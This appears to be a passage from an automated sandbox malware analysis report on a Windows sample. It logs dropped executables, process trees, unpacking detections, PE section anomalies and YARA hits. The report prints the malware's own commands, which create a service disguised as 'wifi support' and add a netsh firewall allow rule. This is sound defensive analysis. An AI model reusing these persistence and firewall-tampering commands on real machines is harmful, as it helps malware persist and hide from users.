                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 520
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CFE8.exe C:\Users\user\AppData\Local\Temp\CFE8.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E2A6.exe C:\Users\user\AppData\Local\Temp\E2A6.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FA5C.exe C:\Users\user\AppData\Local\Temp\FA5C.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\txlhcyih\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gaystiqf.exe" C:\Windows\SysWOW64\txlhcyih\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description txlhcyih "wifi internet conection
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start txlhcyih
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: unknownProcess created: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d"C:\Users\user\AppData\Local\Temp\E2A6.exe"
                          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess created: C:\Users\user\AppData\Local\Temp\FA5C.exe C:\Users\user\AppData\Local\Temp\FA5C.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7D38.exe C:\Users\user\AppData\Local\Temp\7D38.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\adijaeg C:\Users\user\AppData\Roaming\adijaeg
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\96DB.exe C:\Users\user\AppData\Local\Temp\96DB.exe
                          Source: C:\Users\user\AppData\Roaming\adijaegProcess created: C:\Users\user\AppData\Roaming\adijaeg C:\Users\user\AppData\Roaming\adijaeg
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A15C.exe C:\Users\user\AppData\Local\Temp\A15C.exe
                          Source: C:\Users\user\AppData\Local\Temp\A15C.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\96DB.exeProcess created: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Local\Temp\63DA.tmp\63DB.tmp\extd.exe C:\Users\user\AppData\Local\Temp\63DA.tmp\63DB.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 520
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8A6B.tmp
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00419C9A SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringA,SetPriorityClass,
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6924:64:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6760
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4620:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5152:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2216:120:WilError_01
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: 0.0
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: hijaduvinijebup
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: mocisacatenu
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: wapejan
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: wovag
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: cbH
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: Piruvora
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: gukafipa
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: mawecamaxe
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: Hiwejanoji
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: Pusazide
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCommand line argument: hukujid
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCommand line argument: cbH
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCommand line argument: cbH
                          Source: FA5C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 21.0.FA5C.exe.530000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 21.0.FA5C.exe.530000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 21.0.FA5C.exe.530000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 21.0.FA5C.exe.530000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 39.2.FA5C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: sbxGIUIhRd.exeStatic PE information: More than 200 imports for KERNEL32.dll
                          Source: sbxGIUIhRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: sbxGIUIhRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: sbxGIUIhRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: sbxGIUIhRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: sbxGIUIhRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: sbxGIUIhRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.771800332.0000000001127000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.770525500.0000000005019000.00000004.00000001.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.772754936.0000000001121000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: MUC:\des.pdbh source: sbxGIUIhRd.exe, 00000000.00000000.658796199.0000000000401000.00000020.00020000.sdmp, sbxGIUIhRd.exe, 00000000.00000002.664580287.0000000000401000.00000020.00020000.sdmp, sbxGIUIhRd.exe, 00000001.00000000.662835925.0000000000401000.00000020.00020000.sdmp, adijaeg, 00000009.00000000.749578013.0000000000401000.00000020.00020000.sdmp, adijaeg, 00000009.00000002.754692319.0000000000401000.00000020.00020000.sdmp, adijaeg, 0000000A.00000000.751678783.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 0000000D.00000000.762080930.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 0000000D.00000002.772256038.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 00000010.00000000.767772391.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdbz:^^ source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: Kernel.Appcore.pdby2V] source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: LC:\tiroducelidayu\citakuyar\g.pdbh source: E2A6.exe, 00000013.00000000.780837956.0000000000401000.00000020.00020000.sdmp, gaystiqf.exe, 00000023.00000000.802951269.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: C:\fuzobeficepo\fiwasito\cat45\yivo.pdb source: CFE8.exe, 00000012.00000000.774792717.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: profapi.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 8A6B.exe, 0000000C.00000000.756911608.0000000000413000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000002.806679360.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000011.00000002.805591545.0000000005480000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdbv source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdb^ source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: C:\des.pdb source: sbxGIUIhRd.exe, sbxGIUIhRd.exe, 00000000.00000000.658796199.0000000000401000.00000020.00020000.sdmp, sbxGIUIhRd.exe, 00000000.00000002.664580287.0000000000401000.00000020.00020000.sdmp, sbxGIUIhRd.exe, 00000001.00000000.662835925.0000000000401000.00000020.00020000.sdmp, adijaeg, 00000009.00000000.749578013.0000000000401000.00000020.00020000.sdmp, adijaeg, 00000009.00000002.754692319.0000000000401000.00000020.00020000.sdmp, adijaeg, 0000000A.00000000.751678783.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 0000000D.00000000.762080930.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 0000000D.00000002.772256038.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 00000010.00000000.767772391.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdbT source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: C:\fuzobeficepo\fiwasito\cat45\yivo.pdbh source: CFE8.exe, 00000012.00000000.774792717.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: C:\tiroducelidayu\citakuyar\g.pdb source: E2A6.exe, 00000013.00000000.780837956.0000000000401000.00000020.00020000.sdmp, gaystiqf.exe, 00000023.00000000.802951269.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdbl source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdbj source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 8A6B.exe, 0000000C.00000000.756911608.0000000000413000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000002.806679360.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000011.00000002.805591545.0000000005480000.00000002.00020000.sdmp
                          Source: Binary string: profapi.pdb` source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp

                          Data Obfuscation:

                          Detected unpacking (overwrites its own PE header)
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeUnpacked PE file: 18.2.CFE8.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeUnpacked PE file: 19.2.E2A6.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeUnpacked PE file: 35.2.gaystiqf.exe.400000.0.unpack
                          Detected unpacking (changes PE section rights)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeUnpacked PE file: 18.2.CFE8.exe.400000.0.unpack .text:ER;.data:W;.sutala:W;.buve:W;.bobe:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeUnpacked PE file: 19.2.E2A6.exe.400000.0.unpack .text:ER;.data:W;.tojid:W;.vese:W;.fikazap:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeUnpacked PE file: 35.2.gaystiqf.exe.400000.0.unpack .text:ER;.data:W;.tojid:W;.vese:W;.fikazap:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Yara detected BatToExe compiled binaryShow sources
                          Source: Yara matchFile source: 0000002E.00000003.893800912.00000000026D7000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.872943037.000000000063A000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.873526703.0000000000AF0000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002E.00000003.893714086.00000000026D0000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002E.00000003.893898519.00000000024E0000.00000004.00000040.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.872792348.00000000005B0000.00000004.00000020.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000032.00000002.872879776.0000000000630000.00000004.00000020.sdmp, type: MEMORY
                          .NET source code contains method to dynamically call methods (often used by packers)Show sources
                          Source: FA5C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 21.0.FA5C.exe.530000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 21.0.FA5C.exe.530000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 39.2.FA5C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 39.0.FA5C.exe.ab0000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 39.0.FA5C.exe.ab0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_0043DFD4 push es; retn 0042h
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00563634 push es; iretd
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00401880 push esi; iretd
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00402E94 push es; iretd
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00401880 push esi; iretd
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_00412CA4 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_0058127E push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_0058123C push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_0058735E push esp; iretd
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_005853C8 pushfd ; retf
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 13_2_00563634 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00401880 push esi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_004139B0 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00643C00 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00866841 pushfd ; ret
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00866873 pushfd ; ret
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_0086318B push ebx; ret
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00865DE0 pushad ; ret
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00867B53 push ss; retf
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_00538508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_0053764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_027D4003 push esi; retf
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_008B1D16 push 0000002Bh; iretd
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_008AF520 push ds; ret
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_004358C0 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                          Source: FA5C.exe.5.drStatic PE information: 0xA22A793F [Sun Mar 19 11:55:43 2056 UTC]
                          Source: sbxGIUIhRd.exeStatic PE information: section name: .zas
                          Source: sbxGIUIhRd.exeStatic PE information: section name: .give
                          Source: sbxGIUIhRd.exeStatic PE information: section name: .riyevol
                          Source: CF17.exe.5.drStatic PE information: section name: .code
                          Source: 96DB.exe.5.drStatic PE information: section name: .gizi
                          Source: 96DB.exe.5.drStatic PE information: section name: .bur
                          Source: 96DB.exe.5.drStatic PE information: section name: .wob
                          Source: A15C.exe.5.drStatic PE information: section name: .code
                          Source: 95C6.exe.5.drStatic PE information: section name: .zas
                          Source: 95C6.exe.5.drStatic PE information: section name: .give
                          Source: 95C6.exe.5.drStatic PE information: section name: .riyevol
                          Source: CFE8.exe.5.drStatic PE information: section name: .sutala
                          Source: CFE8.exe.5.drStatic PE information: section name: .buve
                          Source: CFE8.exe.5.drStatic PE information: section name: .bobe
                          Source: E2A6.exe.5.drStatic PE information: section name: .tojid
                          Source: E2A6.exe.5.drStatic PE information: section name: .vese
                          Source: E2A6.exe.5.drStatic PE information: section name: .fikazap
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name: .28gybOo
                          Source: B3EB.exe.5.drStatic PE information: section name: .adata
                          Source: C487.exe.5.drStatic PE information: section name: .didata
                          Source: adijaeg.5.drStatic PE information: section name: .zas
                          Source: adijaeg.5.drStatic PE information: section name: .give
                          Source: adijaeg.5.drStatic PE information: section name: .riyevol
                          Source: gaystiqf.exe.19.drStatic PE information: section name: .tojid
                          Source: gaystiqf.exe.19.drStatic PE information: section name: .vese
                          Source: gaystiqf.exe.19.drStatic PE information: section name: .fikazap
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .didata
                          Source: FA5C.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                          Source: B3EB.exe.5.drStatic PE information: real checksum: 0x3721bb should be: 0x373654
                          Source: A15C.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x5e577
                          Source: CF17.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x67108
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.96344242356
                          Source: initial sampleStatic PE information: section name: .text entropy: 7.2566886804
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.96344242356
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.99141183454
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.9644643234
                          Source: initial sampleStatic PE information: section name: entropy: 7.99714766582
                          Source: initial sampleStatic PE information: section name: entropy: 7.90784224501
                          Source: initial sampleStatic PE information: section name: entropy: 7.99361781473
                          Source: initial sampleStatic PE information: section name: entropy: 7.80912989946
                          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22348700263
                          Source: initial sampleStatic PE information: section name: .28gybOo entropy: 7.91849564721
                          Source: initial sampleStatic PE information: section name: .didata entropy: 7.99713235918
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.96344242356
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.9644643234
                          Source: FA5C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
